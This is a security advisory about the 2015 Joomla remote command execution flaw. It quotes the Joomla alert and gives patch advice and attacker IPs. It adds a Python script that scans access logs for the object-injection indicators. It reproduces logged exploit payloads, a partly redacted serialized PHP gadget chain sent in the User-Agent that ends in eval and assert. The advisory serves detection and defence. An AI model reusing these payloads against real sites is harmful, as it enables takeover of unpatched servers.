Joomla security vulnerability - Critical 0-day Remote Command Execution Vulnerability in Joomla

New Joomla security vulnerability -> urgent update required (security alert)

See Joomla Security:

"The Joomla security team have just released a new version of Joomla to patch a critical remote command execution vulnerability that affects all versions from 1.5 to 3.4.

This is a serious vulnerability that can be easily exploited and is already in the wild. If you are using Joomla, you have to update it right now.

Remote Code Execution
There is a security issue in Joomla! from Joomla 1.5 up until 3.4.5 related to remote code execution. This was followed up with some longer term fixes in Joomla 3.4.7.

If you are using the old (unsupported) versions 1.5.x and 2.5.x, you have to apply the hotfixes from here (https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions).

Zero day Exploits in the Wild

What is very concerning is that this vulnerability is already being exploited in the wild and has been for the last 2 days. Repeat: This has been in the wild as a 0-day for 2 days before there was a patch available.

Looking back at our logs, we detected the first exploit targeting this vulnerability:

2015 Dec 12 16:49:07 clienyhidden.access.log
Src IP: 74.3.170.33 / CAN / Alberta
74.3.170.33 - - [12/Dec/2015:16:49:40 -0500] "GET /contact/ HTTP/1.1" 403 5322 "http://google.com/" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..
{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:..
{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:..

and:

access.log:52.32.210.122 - - [01/Feb/2016:11:09:12 +0100] "GET / HTTP/1.1" 200 7348 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:
{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:
{}s:8:\"feed_url\";s:3854:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRV…..gkZnApOw=='));JFactory::getConfig();exit\";s:19:\
"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:
{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"


We modified the payload so it can’t be misused, but the attackers are doing an object injection via the HTTP user agent that leads to a full remote command execution.

The wave of attacks is even bigger, with basically every site and honeypot we have being attacked. That means that probably every other Joomla site out there is being targeted as well.

Protect Your Site Now

If you are a Joomla user, check your logs right away. Look for requests from 146.0.72.83 or 74.3.170.33 or 194.28.174.106 as they were the first IP addresses to start the exploitation. I also recommend searching your logs for “JDatabaseDriverMysqli” or “O:” in the User Agent as it has been used in the exploits. If you find them, consider your Joomla site compromised and move to the remediation / incident response phase.

Note that clients behind our Website Firewall were already protected against this threat and are safe. Yes, our virtual patching for the HTTP User Agent kept our users protected against this exploit.

If you use Joomla, update ASAP!

For those on the 3.x branch, update immediately to 3.4.6.
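The log check recommended above (look for the first attacking IPs, for "JDatabaseDriverMysqli" and for serialized objects in the User-Agent) is easy to get wrong by hand, because Apache escapes the double quotes inside the payload differently depending on the server version: the first excerpt above shows them as \x22, the second as \". The following script is an added example, not code from the quoted advisory or from Joomla; it parses combined-format access log lines, folds both escape styles back to a plain quote, and flags every entry that matches one of the indicators named above. The log lines it runs on are constructed for this example (the attacking IPs and class name are taken from the advisory, the rest is made up); the IPs 203.0.113.10, 198.51.100.7 and 192.0.2.55 are documentation addresses with no meaning here.

```python
import re

# Indicators taken from the advisory above: the first three attacking IPs,
# the Joomla class that starts the gadget chain, and the PHP serialized-object
# marker (O:<length>:") that never appears in a legitimate User-Agent.
SCANNER_IPS = {"146.0.72.83", "74.3.170.33", "194.28.174.106"}
GADGET_CLASS = "JDatabaseDriverMysqli"
SERIALIZED_OBJECT = re.compile(r'O:\d+:"')

# Apache/nginx "combined" log format. The User-Agent is the last quoted field
# and is matched greedily, because the exploit payload itself contains
# escaped double quotes that a "[^"]*" match would stop at.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Constructed sample log for this example: one benign hit, one request
# modelled on the first excerpt above (\x22 escaping), one modelled on the
# second (\" escaping, with the payload shortened and made harmless), one
# benign-looking request from an advisory IP, and a crawler.
SAMPLE_LOG = r'''
203.0.113.10 - - [10/Dec/2015:10:00:01 +0100] "GET / HTTP/1.1" 200 7348 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/42.0"
74.3.170.33 - - [12/Dec/2015:16:49:40 -0500] "GET /contact/ HTTP/1.1" 403 5322 "http://google.com/" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}}"
198.51.100.7 - - [01/Feb/2016:11:09:12 +0100] "GET / HTTP/1.1" 200 7348 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}}"
146.0.72.83 - - [13/Dec/2015:02:15:09 +0100] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.55 - - [14/Dec/2015:09:30:00 +0100] "GET /robots.txt HTTP/1.1" 200 45 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
'''


def parse_combined(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def unescape_log_field(value):
    """Undo the escaping Apache applies to a logged header value.

    A double quote inside the User-Agent is written as \\x22 by some server
    versions and as \\" by others; both are folded back to a plain quote so
    that one pattern matches the serialized object in either form.
    """
    return value.replace("\\x22", '"').replace('\\"', '"')


def indicators_for(entry):
    """Return the advisory indicators matched by one parsed log entry, in a fixed order."""
    hits = []
    ua = unescape_log_field(entry["ua"])
    if entry["ip"] in SCANNER_IPS:
        hits.append("scanner_ip")
    if GADGET_CLASS in ua:
        hits.append("gadget_class")
    if SERIALIZED_OBJECT.search(ua):
        hits.append("serialized_object_in_ua")
    return hits


def scan_log(text):
    """Scan a whole access log; return (ip, timestamp, indicators) for every matching line."""
    findings = []
    for line in text.splitlines():
        entry = parse_combined(line)
        if entry is None:
            continue  # blank line or a line in another format: skip, do not abort the scan
        hits = indicators_for(entry)
        if hits:
            findings.append((entry["ip"], entry["ts"], hits))
    return findings


if __name__ == "__main__":
    for ip, ts, hits in scan_log(SAMPLE_LOG):
        print(f"{ts}  {ip:<15}  {', '.join(hits)}")
```

Run it against a real file with `scan_log(open("/var/log/apache2/access.log").read())`. The serialized-object pattern is deliberately tighter than a plain search for "O:", which also matches harmless strings in ordinary User-Agents; a match on either the class name or the O:<n>:" marker is the signal to treat the site as compromised, as the advisory says. A hit on one of the three IPs alone (the fourth sample line) is worth a closer look but is not proof of exploitation by itself. The check only works if your log format records the User-Agent at all; the "common" format does not.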

If you need help - call us: +49 89 130 133 60